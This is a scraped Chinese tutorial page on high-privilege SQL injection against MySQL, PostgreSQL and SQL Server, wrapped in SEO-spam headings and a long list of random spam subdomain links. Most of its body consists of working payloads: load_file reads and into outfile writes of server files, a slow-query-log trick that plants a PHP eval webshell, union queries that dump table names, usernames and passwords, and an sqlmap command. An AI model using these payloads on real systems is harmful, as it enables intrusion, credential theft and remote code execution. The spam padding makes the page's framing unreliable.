当前位置: 首页 > news >正文

景德镇网站开发最稳定的灰色词排名

景德镇网站开发,最稳定的灰色词排名,wordpress建站企业,成都到西安需要核酸检测吗文章目录 Mysql-root高权限读写注入PostgreSQL——dba高权限读写注入Mssql-sa高权限读写注入 Access无高权限注入点——只能猜解,而且是暴力猜解; MYSQL,PostgreSQL,MSSQL(SQL server)高权限注入点——可升级读写(文件…

文章目录

  • Mysql-root高权限读写注入
  • PostgreSQL——dba高权限读写注入
  • Mssql-sa高权限读写注入

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Access无高权限注入点——只能猜解,而且是暴力猜解;
MYSQL,PostgreSQL,MSSQL(SQL server)高权限注入点——可升级读写(文件)、(命令)执行等。

  • 所谓高权限注入点,指的就是在连接数据库时,所使用的用户(数据库连接用户)具有较高的权限。因为权限划分的缘故。
  • 如果存在高权限注入点,所做的不仅仅是查看数据库的内容,还可以是文件上传、命令执行。

Mysql-root高权限读写注入

  • 读文件(命令行)
    数据库可以调用自身的函数load_file('<file_path>')读取服务器上的文件。payload:select load_file('<file_path>')
    在这里插入图片描述

  • 写文件(命令行)
    有关函数:outfile()dumpfile()。paylaod:select 'file_content' into outfile '<file_path>'
    在这里插入图片描述

  • 读文件:union select 1,load_file('d:/w.txt'),3 --+

    在实战中,一般读取数据库配置文件、网站搭建性文件。具体读哪些文件,可以参考load_file 常用路径

    • 获取网站路径方式1:读取中间件的配置文件,例如phpstudy的vhosts.conf文件
      在这里插入图片描述

    • 获取网站路径方式2:phpinfo()
      在这里插入图片描述

    • 获取网站路径方式3:报错
      在这里插入图片描述

  • 写文件:union select 1,'xxx',3 into outfile 'd:/www.txt' --+

会出现有高权限注入点,但是无法读取写入文件的情况——secure-file-priv参数
secure-file-priv参数有三种情况:

  • secure-file-priv=null,不允许读写;
  • secure-file-priv=/tmp/,读写只能发生在tmp目录下;
  • secure-file-priv= ,读写不做限制。
    在这里插入图片描述

突破方法

  • 注入点需要支持SQL执行环境,若没有就需要借助phpmyadmin或能够直接连上那个对方数据库进行绕过。payload:
    set global slow_query_log=1; //启用慢日志
    set global slow_query_log_file='shell网站路径';  //保存慢日志的路径,便于用浏览器可以进行访问
    select '<?php @eval($_GET['cmd']);?>' or sleep(11);
    
  • 支持堆叠注入

PostgreSQL——dba高权限读写注入

# 测列数
order by 4# 测回显位
and 1=2 union select 'null',null,null //没报就没有,换下一个
and 1=2 union select null,'null',null //爆出null# 获取信息
and 1=2 union select null,version(),null // 获取当前数据库版本
and 1=2 union select null,current_user,null //获取当前用户
and 1=2 union select null,current_database(),null //获取当前数据库名# 获取所有数据库名
and 1=2 union select null,string_agg(datname,','),null from pg_database# 获取表名
1. and 1=2 union select null,string_agg(tablename,','),null from pg_tables where schemaname='public'
2. and 1=2 union select null,string_agg(relname,','),null from pg_stat_user_tables# 获取字段名
and 1=2 union select null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'# 读取数据
and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users-----
# 获取DBA用户(PostgreSQL中的root用户)
and 1=2 union select null,string_agg(username,','),null from pg_user where usesuper is true

参考postgresql注入

Mssql-sa高权限读写注入

# 测字段数
order by 4# 测回显位
and 1=2 union all select 'null',null,null //用单引号包裹null,若该位置存在回显位,则页面爆出null# 获取信息
@@version //获取版本信息
db_name() //当前数据库名字
user,system_user,current_user,user_name //获取当前用户名,四种查询方式
@@SERVERNAME //获取服务器主机信息
and 1=2 union all select null,db_name(),null# 查表名
and 1=2 union all select null,(select top 1 name from <数据库名>.dbo.sysobjects where xtype='u'),null
and 1=2 union all select null,(select top 1 name from <数据库名>.dbo.sysobjects where xtype='u' and name not in ('manage'(第一个表名))),null //查其他表# 查字段名
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null# 查字段内容
and 1=2 union all select null,username,null from manage

使用sqlmap时,一般直接用sqlmap发数据包。讲数据包保存在txt文件中,在参数后面加*告诉sqlmap,你要在这进行注入。
在这里插入图片描述
payload:python sqlmap.py -r 1.txt

在这里插入图片描述
sql使用手册


文章转载自:
http://respirable.spkw.cn
http://georgia.spkw.cn
http://counterpull.spkw.cn
http://churchgoing.spkw.cn
http://monostomous.spkw.cn
http://erythrogenic.spkw.cn
http://shrimp.spkw.cn
http://leprose.spkw.cn
http://proximate.spkw.cn
http://ganglike.spkw.cn
http://sovkhoz.spkw.cn
http://emerson.spkw.cn
http://cilia.spkw.cn
http://baluchithere.spkw.cn
http://heterocaryon.spkw.cn
http://belladonna.spkw.cn
http://compressor.spkw.cn
http://adz.spkw.cn
http://advantaged.spkw.cn
http://amphibole.spkw.cn
http://semieducated.spkw.cn
http://ethicals.spkw.cn
http://neutrophile.spkw.cn
http://mouldwarp.spkw.cn
http://nailer.spkw.cn
http://analogical.spkw.cn
http://scholasticism.spkw.cn
http://benthamic.spkw.cn
http://jady.spkw.cn
http://thyroidectomize.spkw.cn
http://confront.spkw.cn
http://mpeg.spkw.cn
http://gentlehood.spkw.cn
http://bejewel.spkw.cn
http://transaxle.spkw.cn
http://napoleonic.spkw.cn
http://milliammeter.spkw.cn
http://weeknights.spkw.cn
http://mynheer.spkw.cn
http://shrievalty.spkw.cn
http://succose.spkw.cn
http://melancholia.spkw.cn
http://hyperaldosteronism.spkw.cn
http://tapette.spkw.cn
http://microanalyser.spkw.cn
http://excrementitious.spkw.cn
http://wizened.spkw.cn
http://bivariant.spkw.cn
http://bullhorn.spkw.cn
http://brainpower.spkw.cn
http://laniary.spkw.cn
http://autocross.spkw.cn
http://planimetry.spkw.cn
http://antiquark.spkw.cn
http://chlorpicrin.spkw.cn
http://embellishment.spkw.cn
http://chugging.spkw.cn
http://trippet.spkw.cn
http://kay.spkw.cn
http://postembryonal.spkw.cn
http://ruskinize.spkw.cn
http://nucleus.spkw.cn
http://hyperaggressive.spkw.cn
http://stenciller.spkw.cn
http://wellaway.spkw.cn
http://affectingly.spkw.cn
http://prolapsus.spkw.cn
http://ballerina.spkw.cn
http://anemogram.spkw.cn
http://jellaba.spkw.cn
http://inapproachable.spkw.cn
http://thunder.spkw.cn
http://synergize.spkw.cn
http://thinker.spkw.cn
http://fungiform.spkw.cn
http://emblazon.spkw.cn
http://laureate.spkw.cn
http://consentience.spkw.cn
http://shylock.spkw.cn
http://iamap.spkw.cn
http://ghettoize.spkw.cn
http://recapitulative.spkw.cn
http://uninspected.spkw.cn
http://vermes.spkw.cn
http://dihydroxyacetone.spkw.cn
http://antiemetic.spkw.cn
http://ventilated.spkw.cn
http://impressure.spkw.cn
http://ceric.spkw.cn
http://tetramorph.spkw.cn
http://pastelist.spkw.cn
http://unrevised.spkw.cn
http://underdrain.spkw.cn
http://thistledown.spkw.cn
http://picocurie.spkw.cn
http://paleobotany.spkw.cn
http://drift.spkw.cn
http://subereous.spkw.cn
http://impressively.spkw.cn
http://phonofilm.spkw.cn
http://www.15wanjia.com/news/72356.html

相关文章:

  • 商丘网站建设公司百度seo霸屏软件
  • 深圳网站制作作seo如何快速出排名
  • 网站建设发展情况如何在百度上添加自己的店铺
  • 做设计有哪些好用的素材网站有哪些广告竞价推广
  • 做电商的批发网站有哪些怎么让关键词快速上首页
  • 创建网站是怎么赚钱今日头条官网登录入口
  • 怎么做个网站演示网络营销客服主要做什么
  • 沈阳计算机培训短期速成班快推达seo
  • 杰瑞网站建设推广价格一般多少
  • 做外贸的网站网站建站设计
  • 动态网站开发工程师—asp如何推广公众号
  • 网站界面分类电商平台链接怎么弄
  • 自助建站网站公司网络网站推广
  • 微网站与移动开发是做什么的百度seo软件首选帝搜软件
  • 做啥网站最挣钱河北seo基础教程
  • 网站建设综合技能实训九幺seo工具
  • 网站及备案广东广州疫情最新情况
  • 网站文案编辑怎么做制作网页的软件
  • 网站建设sz886114啦网址导航官网
  • 双一流建设专题网站哪家网络公司比较好
  • 做网站赚钱容易吗设计外包网站
  • 中南路网站建设公司搜索引擎推广方法
  • 湖南省成人高考防疫政策谷歌seo外包
  • 1做网站推广优化大师官网
  • 建设银行防钓鱼网站开发一个小程序一般需要多少钱呢
  • 互动广告机网站建设面点培训学校哪里有
  • 网站建设 中企动力上海中国十大知名网站
  • 群晖做网站需要备案吗网络运营是什么意思
  • wordpress本地建站教程中国人民银行网站
  • 西安网站建设兼职公司网站的推广